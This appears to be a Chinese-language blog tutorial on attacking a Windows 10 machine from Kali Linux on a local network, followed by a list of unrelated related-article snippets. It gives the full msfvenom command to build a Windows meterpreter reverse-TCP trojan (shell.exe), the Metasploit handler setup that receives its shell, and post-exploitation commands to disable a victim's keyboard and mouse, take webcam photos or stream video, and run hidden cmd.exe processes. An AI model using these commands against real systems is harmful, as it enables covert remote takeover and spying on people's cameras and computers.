kali linux外网渗透指定ip,kali Linux局域网渗透之win10

kali机：192.168.198.134

win10：192.168.198.1

我们先来查看下自己的IP地址

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)

2020-1-17 15:36 上传

接着我们使用fping来扫描一下局域网内的所有IP

fping -g IP/24 -->扫描局域网内所有IP

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (629.88 KB, 下载次数: 10)

2020-1-17 15:36 上传

攻击正式开始

1.我们先用msfvenom来生成一个木马文件，它将在root目录生成一个名叫shell.exe文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe

LHOST -->本地的IP地址

LPORT -->反向连接到主机的端口

R> -->木马生成的保存输出路径

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (533.32 KB, 下载次数: 16)

2020-1-17 15:36 上传

2.打开msfconsole，键入以下代码

msf > use exploit/multi/handler -->设置模块

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接

msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址

msf exploit(multi/handler) > set lport 5555 -->设置端口，需要跟前面生成的木马端口一致

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (565.29 KB, 下载次数: 14)

2020-1-17 15:36 上传

开始攻击

exploit -->执行攻击命令

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (570.52 KB, 下载次数: 12)

2020-1-17 15:36 上传

3.现在我把马放在自己本机上，由于隐私问题我们不放图片了

现在我们来运行shell.exe，然而并没有什么反应，但实际上木马已经运行了，kali也监听到了

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (583.66 KB, 下载次数: 14)

2020-1-17 15:36 上传

4.开始搞事

现在你又可以为所欲为了

部分指令如下

uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all] -->开启或禁止键盘/鼠标

uictl disable mouse -->禁用鼠标

uictl disable keyboard -->禁用键盘

webcam摄像头命令

webcam_list -->查看摄像头

webcam_snap -->通过摄像头拍照

webcam_stream -->通过摄像头开启视频

execute执行文件

execute -->在目标机中执行文件

execute -H -i -f cmd.exe -->创建新进程cmd.exe，-H不可见，-i交互详细指令请见：先知社区

我们以查看自己当前所在用户组为例

执行shell来运行cmd

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (600.23 KB, 下载次数: 16)

2020-1-17 15:36 上传

可以看出我们的用户名叫sievr，归属于sievr用户组

然后我们来验证一下

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (434.9 KB, 下载次数: 12)

2020-1-17 15:36 上传

完全正确

好的本次教程就到这里，有不懂的欢迎私信！

kali linux外网渗透指定ip,kali Linux局域网渗透之win10相关推荐

Linux外网远程登录访问内网主机
Linux外网远程登录访问内网主机远程登录软件:Xshell6 主机系统:ubuntu-19.10-desktop-amd64 连接协议:ssh 虚拟机:VMware Workstation 16 ...
[记录]阿里云云服务器启动nginx，服务器可以通过localhost:80能够访问，外网无法通过ip访问80端口
阿里云云服务器启动nginx后,服务器可以通过localhost:80能够访问,外网无法通过ip访问80端口问题描述:在阿里云服务器上安装好nginx,配置好前端文件夹路径后,通过ip:80无法响应 ...
乐鑫esp8266学习rtos3.0笔记第12篇：无需外网，如何实现在本地局域网与控制端做数据交换，分享开发心得。（附带demo）
本系列博客学习由非官方人员半颗心脏潜心所力所写,不做开发板.仅仅做个人技术交流分享,不做任何商业用途.如有不对之处,请留言,本人及时更改. 1. Esp8266之搭建开发环境,开始一个" ...
Server-U 访问外网服务器指定端口（内网21端口，外网其他端口）
1.安装server-u,创建用户和域自行百度. 2.先使用同一局域网使用xftp或FileZilla工具进行测试,同一网端无法连接成功请自行百度,这里不详细描述. 3.内外网映射例如:内网使用ft ...
red hat关于桥接模式连不上外网或者没有IP
很多人·在启动虚拟机后连接不上外网,即ifconfig没有ip地址,我总结了一下需要注意的地方: 以下全是在桥接模式. 1.在windows中打开任务管理器-->服务中找到一下几个服务,确保它们 ...
xenapp 发布到外网更改公网IP。
更改外网IP时需同时更改 web site 安全访问中配置的公网地址. 转载于:https://blog.51cto.com/feige/921127
linux外网服务器跳转内网服务器实现内网访问（iptables）
服务器信息如下外网服务器:eth0:公网IP eth1:内网IP(192.168.10.205) 公网对外提供服务,内网IP与内部局域网通信. 配置过程: (1)开启iptables service ...
Elasticsearch外网无法通过ip访问
目录 1 遇到的问题 2 解决方法 1 遇到的问题外网服务器安装 elasticsearch,解压elasticsearch之后,启动,通过 http://localhost:9200 可以访问的到 ...
一张图理解内网、外网、动态IP
大家都知道中国是一个IPV4地址严重缺乏的国家,所以我们的拨号宽带一直都是动态IP,没有固定IP,后来更过分的是很多城市出现了内网IP,还有我们所有的二级宽带ISP提供的都是内网IP,内网IP越来越多 ...

kali linux外网渗透指定ip,kali Linux局域网渗透之win10

kali linux外网渗透指定ip,kali Linux局域网渗透之win10相关推荐

最新文章

热门文章